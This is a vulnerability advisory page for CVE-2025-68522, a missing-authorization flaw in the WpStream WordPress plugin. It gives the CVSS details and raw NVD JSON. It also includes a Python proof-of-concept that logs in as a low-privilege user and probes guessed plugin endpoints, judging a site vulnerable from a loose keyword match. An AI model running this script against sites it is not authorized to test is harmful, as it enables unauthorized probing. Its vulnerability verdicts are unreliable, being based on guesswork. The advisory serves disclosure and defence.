Security Vulnerability Report
中文
CVE-2025-68522 CVSS 4.3 MEDIUM

CVE-2025-68522

Published: 2025-12-24 13:16:22
Last Modified: 2026-04-27 19:16:28

Description

Missing Authorization vulnerability in wpstream WpStream wpstream allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WpStream: from n/a through <= 4.9.5.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

WpStream插件 <= 4.9.5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-68522 PoC - WordPress WpStream Authorization Bypass # This PoC demonstrates the missing authorization vulnerability in WpStream plugin import requests import sys def check_vulnerability(target_url, username, password): """ Check if the target WordPress site with WpStream plugin is vulnerable """ # Login as low-privilege user (subscriber/contributor) login_url = f"{target_url}/wp-login.php" session = requests.Session() login_data = { 'log': username, 'pwd': password, 'wp-submit': 'Log In', 'redirect_to': '/wp-admin/', 'testcookie': '1' } try: # Attempt login login_response = session.post(login_url, data=login_data, timeout=10) if 'wordpress_logged_in' in str(session.cookies): print(f"[+] Successfully logged in as {username}") # Try to access WpStream admin functionality as low-privilege user # Common WpStream endpoints that might be affected wpstream_endpoints = [ '/wp-admin/admin-ajax.php?action=wpstream_admin_action', '/wp-json/wpstream/v1/', '/wp-admin/admin.php?page=wpstream' ] for endpoint in wpstream_endpoints: url = f"{target_url}{endpoint}" response = session.get(url, timeout=10) # Check if we can access admin functionality without proper authorization if response.status_code == 200 and ('wpstream' in response.text.lower() or 'stream' in response.text.lower()): print(f"[+] VULNERABLE: Low-privilege user can access {endpoint}") print(f"[+] Response indicates access to WpStream functionality") return True elif response.status_code == 200: print(f"[*] Endpoint {endpoint} accessible (needs manual verification)") print("[-] No obvious vulnerability indicators found") return False else: print("[-] Login failed") return False except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") return False if __name__ == "__main__": if len(sys.argv) < 4: print("Usage: python poc.py <target_url> <username> <password>") print("Example: python poc.py http://example.com subscriber password123") sys.exit(1) target = sys.argv[1] user = sys.argv[2] pwd = sys.argv[3] check_vulnerability(target, user, pwd)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-68522", "sourceIdentifier": "[email protected]", "published": "2025-12-24T13:16:21.763", "lastModified": "2026-04-27T19:16:27.770", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in wpstream WpStream wpstream allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WpStream: from n/a through <= 4.9.5."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/wpstream/vulnerability/wordpress-wpstream-plugin-4-9-5-broken-access-control-vulnerability-2?_s_id=cve", "source": "[email protected]"}]}}